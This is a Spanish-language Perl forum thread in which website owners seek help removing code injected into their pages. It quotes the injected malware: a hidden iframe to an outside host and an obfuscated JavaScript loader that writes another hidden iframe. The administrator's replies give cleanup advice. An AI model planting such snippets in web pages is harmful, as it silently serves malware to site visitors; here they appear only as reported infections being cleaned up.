• Publicidad

Script para eliminar inyección maliciosa en sitio web

Así que programas sin strict y las expresiones regulares son otro modo de hablar. Aquí encontrarás respuestas de nivel avanzado, no recomendable para los débiles de corazón.

Re: Script para eliminar inyección maliciosa en sitio web

Notapor Jarmcito » 2009-08-01 13:17 @595

Este virus afecta a los index.*. A mi me afectó tanto esos archivos como el mainfile.php.

Actualmente tengo ese problema con la diferencia que este virus no solo está en una sola web mía, sino en varias; la mas afectada es.

nortechico.com.pe

Me tira este código al final.
Sintáxis: [ Descargar ] [ Ocultar ]
Using php Syntax Highlighting
$xoopsOption['template_main'] = "db:sys
<iframe src="
http://x8v.ru:8080/index.php" width=167 height=121 style="visibility: hidden"></iframe>
Coloreado en 0.019 segundos, usando GeSHi 1.0.8.4


Pregunta 1:
¿Hay algo que se podría hacer para eliminar este virus de las páginas actuales sin necesidad de estar viendo una página por página ya que yo uso un CMS y contiene muchísimas páginas?

Pregunta 2:
Si ya eliminé toda el public_html/ de mi servidor, ¿cómo hago para saber si ya eliminé el virus que está dentro de mi hosting o si aun permanece, tal para poder instalar nuevamente y que la nueva web no sea afectada por este virus?

Agradezco de antemano su ayuda.
Jarmcito
Perlero nuevo
Perlero nuevo
 
Mensajes: 2
Registrado: 2009-08-01 13:09 @590

Publicidad

Re: Script para eliminar inyección maliciosa en sitio web

Notapor explorer » 2009-08-01 20:19 @888

Ya encontré la información. Parece que estos ataques se llaman Iframes .cn attacks. Y parece que van a más.

Y el problema no está en el servidor donde quedan las páginas, sino en el propio ordenador del usuario: un virus captura los accesos y contraseñas a sitios FTP, que usará para acceder a ellos y modificar las páginas, con la intención de diseminar el virus entre las personas que las visiten.

En esa misma página se describe un método de limpieza, que se resume en:
  1. Empieza con tu propio ordenador. Escanéalo con un antivirus y herramientas anti-spyware
  2. Una vez que estés seguro de que tu ordenador está limpio, cambia las contraseñas de todo el sitio web. (Es posible que desee cambiar las contraseñas del ordenador y de la red, también)
  3. Mantenga las nuevas contraseñas en un sitio seguro. No use las posibilidades de auto-subida de los editores web. Entre las contraseñas cada vez que quiera subir nuevo contenido. Use SFTP en lugar de FTP si le es posible.
  4. Elimine el código malicioso (los iframes) de los ficheros del servidor. La forma más fácil es subir un contenido limpio desde la última copia de seguridad.
  5. Escanea los directorios del servidor por cualquier fichero nuevo/sospechoso (no olvide comprobar los ficheros ocultos). Elimine cualquier cosa que no debería estar allí.
  6. Si el sitio fue marcado por Google, pida una revisión de malware via las Webmaster Tools.
  7. Regularmente, compruebe su sitio con las herramientas de diagnóstico de su elección (las Unmask Parasites pueden ser una de ellas) para asegurarse de que el sitio está limpio.

Eso sí... este malware es solo para la gente que aún insiste en usar Windows como sistema de desarrollo.
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
Avatar de Usuario
explorer
Administrador
Administrador
 
Mensajes: 14480
Registrado: 2005-07-24 18:12 @800
Ubicación: Valladolid, España

Re: Script para eliminar inyección maliciosa en sitio web

Notapor oscarenzo » 2009-08-02 13:18 @596

Hola, buenas tardes a todos, soy nuevo en el foro, llegué aquí ya que he sido infectado por ese troyano. He probado el script Perl, que vi en este post, pero tenía algunas dudas. No sé si alguien me podría ayudar, se lo agradecería de corazón.
oscarenzo
Perlero nuevo
Perlero nuevo
 
Mensajes: 3
Registrado: 2009-08-02 13:16 @594

Re: Script para eliminar inyección maliciosa en sitio web

Notapor explorer » 2009-08-02 16:46 @740

Bienvenido a los foros de Perl en Español, oscarenzo.

¿Cuáles son esas dudas? Deberías haberlas expuesto ya mismo. :)
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
Avatar de Usuario
explorer
Administrador
Administrador
 
Mensajes: 14480
Registrado: 2005-07-24 18:12 @800
Ubicación: Valladolid, España

Re: Script para eliminar inyección maliciosa en sitio web

Notapor oscarenzo » 2009-08-06 08:06 @379

Hola, buenas tardes a todos. Creo que tengo un virus en el hosting. ¿Alguien sabe de qué repentinamente aparezca este código en mi index.php?

Sintáxis: [ Descargar ] [ Ocultar ]
  1. <script type="text/javascript">var GDNWkFVfDjqLGhmperCG = "JIC60JIC105JIC102JIC114JIC97JIC109JIC101JIC32JIC119JIC105JIC100JIC116JIC104JIC61JIC34JIC52JIC56JIC48JIC34JIC32JIC104JIC101JIC105JIC103JIC104JIC116JIC61JIC34JIC54JIC48JIC34JIC32JIC115JIC114JIC99JIC61JIC34JIC104JIC116JIC116JIC112JIC58JIC47JIC47JIC115JIC101JIC110JIC100JIC50JIC57JIC5JIC121JIC58JIC48JIC59JIC32JIC102JIC105JIC108JIC116JIC101JIC114JIC58JIC112JIC114JIC111JIC103JIC105JIC100JIC58JIC68JIC88JIC73JIC109JIC97JIC103JIC101JIC84JIC114JIC97JIC110JIC115JIC102JIC111JIC114JIC109JIC46JIC77JIC105JIC99JIC114JIC111JIC115JIC111JIC102JIC116JIC46JIC65JIC108JIC112JIC104JIC97JIC40JIC111JIC112JIC97JIC99JIC105JIC116JIC121JIC61JIC48JIC41JIC59JIC32JIC45JIC109JIC111JIC122JIC45JIC111JIC112JIC97JIC99JIC105JIC116JIC121JIC58JIC48JIC34JIC62JIC60JIC47JIC105JIC102JIC114JIC97JIC109JIC101JIC62";var ATBqxXDPrVCyYPUJUqoY = GDNWkFVfDjqLGhmperCG.split("JIC");var ZfjgNWVrNYxNrzEpXHFO = "";for (var cHNBWhKrYzQyezerWzjj=1; cHNBWhKrYzQyezerWzjj<ATBqxXDPrVCyYPUJUqoY.length; cHNBWhKrYzQyezerWzjj++){ZfjgNWVrNYxNrzEpXHFO+=String.fromCharCode(ATBqxXDPrVCyYPUJUqoY[cHNBWhKrYzQyezerWzjj]);}document.write(ZfjgNWVrNYxNrzEpXHFO)</script><iframe src="http://of.net/?click=14A650" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> 
oscarenzo
Perlero nuevo
Perlero nuevo
 
Mensajes: 3
Registrado: 2009-08-02 13:16 @594

Re: Script para eliminar inyección maliciosa en sitio web

Notapor explorer » 2009-08-06 09:02 @418

Lee con calma el hilo, los mensajes anteriores, y verás que es muy posible que el virus lo tengas en tu propio ordenador.
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
Avatar de Usuario
explorer
Administrador
Administrador
 
Mensajes: 14480
Registrado: 2005-07-24 18:12 @800
Ubicación: Valladolid, España

Re: Script para eliminar inyección maliciosa en sitio web

Notapor oscarenzo » 2009-08-06 09:15 @427

Sí, he leído los mensajes anteriores, he formateado mi ordenador, pero no sé qué pasa ahora :S
oscarenzo
Perlero nuevo
Perlero nuevo
 
Mensajes: 3
Registrado: 2009-08-02 13:16 @594

Re: Script para eliminar inyección maliciosa en sitio web

Notapor Jarmcito » 2009-08-10 15:07 @671

El tema es cómo hacer si no tengo ningún backup, y quiero salvar la web ya que por descuido no guardé ninguna copia de respaldo y quiero eliminar ese virus...
Jarmcito
Perlero nuevo
Perlero nuevo
 
Mensajes: 2
Registrado: 2009-08-01 13:09 @590

Re: Script para eliminar inyección maliciosa en sitio web

Notapor explorer » 2009-08-10 16:40 @736

Bueno, pues si has eliminado el virus del ordenador, conéctate al servidor y bájate las páginas. Luego, te toca editarlas para quitar el iframe que el virus ha pegado. Puedes hacerlo a mano, una por una, o usar la solución de kidd.
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
Avatar de Usuario
explorer
Administrador
Administrador
 
Mensajes: 14480
Registrado: 2005-07-24 18:12 @800
Ubicación: Valladolid, España

Anterior

Volver a Avanzado

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 1 invitado